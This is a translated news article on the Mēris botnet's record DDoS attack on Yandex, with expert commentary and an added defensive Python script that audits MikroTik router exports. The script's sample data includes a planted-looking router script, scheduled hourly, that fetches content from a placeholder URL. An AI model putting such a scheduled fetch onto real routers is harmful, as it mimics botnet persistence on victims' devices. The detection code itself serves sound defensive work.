The most powerful cyber attack in internet history was carried out against Russia's Yandex
On Wednesday, September 8, it became known that the most powerful cyber attack in the history of the Internet had been carried out against Yandex, and that the company's specialists had managed to repel it. The Russian tech giant was attacked by a botnet called Mēris, which means "plague" in Latvian. This type of threat is not as familiar to the average user as Trojans that steal money or viruses that spy on users through smartphone cameras. Yet in reality the problem concerns hundreds of thousands of ordinary Russians. Lenta.ru looked into the extent of the threat.
Alexei is an information security specialist, well known in narrow circles, who suddenly discovered that for several months he had failed to notice that his own laptop was infected. For this reason, he asks that neither his real name nor the company he currently represents be revealed.
For more than a year, a relatively new home laptop periodically lost performance and behaved suspiciously: the cooling fans switched off on their own, a freshly opened browser crashed instantly, the device threw errors, overloaded the network, and went into long reboots.
“It seems to me that even a person far from the world of technology would have suspected something was wrong,” Alexei says sadly. “But all this coincided with the start of the pandemic; there was a lot of work, and we were trying to provide secure remote work for thousands of employees of one of the largest Russian companies. When the load went down, I sat down to analyze the network activity and realized that the laptop had become part of a botnet.”
Your device may already be in some botnet
If your laptop becomes part of a botnet, fixing the problem on that one device generally won't solve it. The threat posed by botnets is more serious than is generally thought. The devil's main trick is that the unwitting agents of this threat are people who have never heard the term in their lives.
“A botnet is a network of compromised devices whose owners have no idea that they have been compromised. These could be smart-home or Internet of Things devices, as well as home routers and access points,” says Alexander Akhremshik, lead analyst at Jet CSIRT, the information security monitoring and incident response center of Jet Infosystems.
The specialist notes that, as a rule, the security of such devices is given little attention. “They often have default passwords or outdated firmware, so it is very easy to hack them and make them part of a botnet. Think about the password on your home router: if the answer is 'the default one', your device may already be in some botnet,” adds Akhremshik.
When it comes to infecting the computers of ordinary people rather than corporate networks, the difference between a botnet and other common malware is that a traditional Trojan will almost instantly try to steal bank card details or passwords for social networks. A bot simply takes over control of the device. From that moment on, it waits for an order from whoever now controls it.
“The botnet creator tries to grow the number of devices to at least 10,000-100,000,” explains Pavel Korostelev, head of product promotion at Security Code. “After that an attack can be carried out, which step by step looks like this: the operator issues a command to all devices in the network through the botnet management console. The command is delivered to the devices via the Internet and executed with the help of pre-generated code. The bots can be assigned to send traffic or requests to a specific address, or to execute malicious code when a particular resource needs to be penetrated.”
Executing a command on hundreds of thousands of devices usually amounts to a DDoS attack. The more links in the chain, the harder it is for the victim to resist. In theory, it is possible to build a botnet that is impossible to defend against at all. If it attacked, it would certainly break through the company's defenses. The problems can be fixed, but it takes a long time, at best hours. This is what hackers exploit: a massive attack that paralyzes and disrupts all internal and external business processes. The larger the company, the greater the losses it incurs.
Botnets are like rare diseases
Russia is firmly on the list of the 10 countries most affected by botnets. The traditional leaders of this ranking are the most populous states (India and China occupy the first places), as well as countries with a smaller population but a high level of technology penetration (the USA, Brazil, Great Britain).
A botnet's "home port" officially says nothing about who uses it for their own purposes. For example, India has practically no hacker groups capable of carrying out attacks on a global scale. This means that most of the infected devices there are almost certainly controlled from other countries.
In Russia, the problem is not limited to urban residents, who are considered the technological leaders. On the constantly updated map of botnet activity, one can find infected machines located somewhere on the Russian-Mongolian border, and servers in Transbaikalia that control the network.
Another advantage botnets enjoy is that it is impossible to determine the number of infected devices in any specific country. For example, at the time of writing, private sources reported about 300 thousand such devices on Russian territory. However, that count includes only the devices that were active at the time of the calculation. The real number may be ten times higher.
Who attacked Yandex?
There is no answer to this question, and it is unlikely that one will be obtained in the foreseeable future. After the attack, Yandex specialists published a large write-up on Habr describing the technical details of the attack. Incidentally, the next day Habr itself was attacked, though on a smaller scale.
In the most strategically important part of the study, Yandex specialists discussed the number of devices in the botnet that attacked the company. “We collected data on 56,000 attacking devices. But we assume that the real number is much higher, perhaps more than 200 thousand devices. The full power of the botnet is not visible because of device rotation and the attackers' unwillingness to show all of their available capacity. Furthermore, the devices in the botnet are high-performance devices, not the typical Wi-Fi-connected IoT devices. Most likely, the botnet consists of devices connected via Ethernet; most of them are network devices,” Yandex notes.
It turned out that devices from dozens of countries took part in the attack, and Russia was not at the top of the list. Almost all of the top ten countries by incidence are mentioned: India, China, Brazil, the USA, Indonesia and Iraq.
In the history of the Internet there have been networks with a larger number of infected devices. The largest botnet was Storm, which, judging by indirect signs, was created in Russia (incidentally, many of the most famous botnets have roots in the post-Soviet space or lines of code in Russian). The peak of its activity fell in the 2000s, and its size was estimated at tens of millions of computers.
“Comparing the attack on Yandex with other dangerous botnets, it is tempting to say that 200,000 is no threat at all next to networks of millions of devices,” Alexei says. “But it is very important to understand that an attack by 30 million devices in 2007 and an attack by 200,000 now are quite similar in strength: the technology and capabilities of devices have changed very seriously over a decade and a half.”
“Many botnet owners rent their botnets out to other criminals and receive a reward for it,” Akhremshik says. “Thus some cybercriminals profit from their botnet, while others achieve their goal, which could be disrupting a competitor's resource, extortion, distributing malware, or even political protest (hacktivism). In some cases, such attacks are a demonstration of capabilities and a means of self-promotion in order to generate interest in the services of a new botnet. That means they can be carried out by the owners themselves rather than by some client. Most likely, we will soon learn that cybercriminals are offering the services of a new botnet of hitherto unprecedented capacity on the dark web.”
How will they deal with Mēris?
Yandex believes that the botnet is mainly made up of devices from the Latvian company MikroTik, which specializes in routers. The Russian experts sent the manufacturer the details of their investigation. MikroTik issued an official response on Friday: “As far as we know, these attacks use the same routers that were compromised in 2018. Unfortunately, the patch did not protect the routers immediately. If someone learned your password in 2018, the update alone won't help you. It's that simple. You should also change your password, double-check your firewall so that it does not allow remote access to unknown parties, and look for scripts that you did not create. As far as we know, there are currently no new vulnerabilities in these devices.”
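One way to turn MikroTik's advice into a repeatable check, as an added example that is not code from the article, from Yandex or from MikroTik: the script below parses the text that a RouterOS `/export verbose` command prints and flags scripts the owner does not recognize, scheduler entries that run something other than a known script, and management services left reachable from any address. The sample export, the script and scheduler names, and the `known_scripts` list are constructed for illustration and are not taken from any real router.

```python
"""Audit a MikroTik RouterOS export for the items MikroTik's advice points at:
scripts the owner did not create, scheduler entries that run them, and
management services that accept connections from anywhere.

Added example, not code from Lenta.ru, Yandex or MikroTik. It assumes the
operator ran `/export verbose` on the router and saved the text; the export
below is a constructed sample.
"""
import re

# Management services that should not be reachable from arbitrary addresses.
REMOTE_SERVICES = {"www", "www-ssl", "winbox", "api", "api-ssl", "ssh", "telnet", "ftp"}

# key=value pairs; the value is either a double-quoted string or a bare token.
KV_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')

# Constructed sample of what `/export verbose` prints (hypothetical names).
SAMPLE_EXPORT = """\
# constructed sample, not a real router export
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=no port=80
set winbox address=192.168.88.0/24 disabled=no port=8291
/system script
add name=backup-nightly owner=admin policy=read,write source="/system backup save"
add name=script1 owner=admin policy=ftp,read,write,policy,test source="/tool fetch url=http://EXAMPLE-PLACEHOLDER/u"
/system scheduler
add interval=1h name=sched1 on-event=script1 start-time=startup
"""


def parse_kv(rest):
    """Split the tail of an `add`/`set` line into a dict. Bare tokens that are
    not key=value (e.g. the service name in `set www ...`) go under `_name`."""
    fields, bare, pos = {}, [], 0
    for m in KV_RE.finditer(rest):
        bare.extend(rest[pos:m.start()].split())
        fields[m.group(1)] = m.group(2).strip('"')
        pos = m.end()
    bare.extend(rest[pos:].split())
    if bare:
        fields["_name"] = bare[0]
    return fields


def parse_export(text):
    """Map each section header such as '/system script' to its list of
    (verb, fields) entries; comments and blank lines are skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        verb, _, rest = line.partition(" ")
        sections[current].append((verb, parse_kv(rest)))
    return sections


def audit(text, known_scripts=()):
    """Return a list of finding strings. `known_scripts` holds the names the
    operator remembers creating; every other script is reported."""
    sections = parse_export(text)
    findings = []
    for _, f in sections.get("/system script", []):
        name = f.get("name", "?")
        if name not in known_scripts:
            findings.append(f"unknown script '{name}': {f.get('source', '')[:60]}")
    for _, f in sections.get("/system scheduler", []):
        event = f.get("on-event", "")
        if event not in known_scripts:
            findings.append(f"scheduler '{f.get('name', '?')}' runs every "
                            f"{f.get('interval', '?')}: {event[:60]}")
    for _, f in sections.get("/ip service", []):
        name = f.get("_name")
        unrestricted = f.get("address", "") == ""
        if name in REMOTE_SERVICES and f.get("disabled") != "yes" and unrestricted:
            findings.append(f"service '{name}' enabled with no address restriction")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT, known_scripts=("backup-nightly",)):
        print(finding)
```

Against the constructed sample with only `backup-nightly` declared as known, the audit reports the unrecognized script, the scheduler that runs it, and the web service left open to any address; `winbox` is not reported because it is restricted to a local subnet. The export cannot show whether the admin password is still the factory default, so that part of the advice still has to be checked by hand.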
These tips will slow rather than stop the spread of the botnet. Users rarely pay attention not only to reflashing the router's firmware, but even to the need to change the factory password.
“With a high degree of probability, the attackers will be found through the botnet's control servers,” Korostelev believes. He says this is the most common way to combat botnet attacks, since blocking each router individually is a very long and expensive process. “Tech companies usually work with law enforcement on these matters, allowing them either to block the botnet control server or to take control of it.”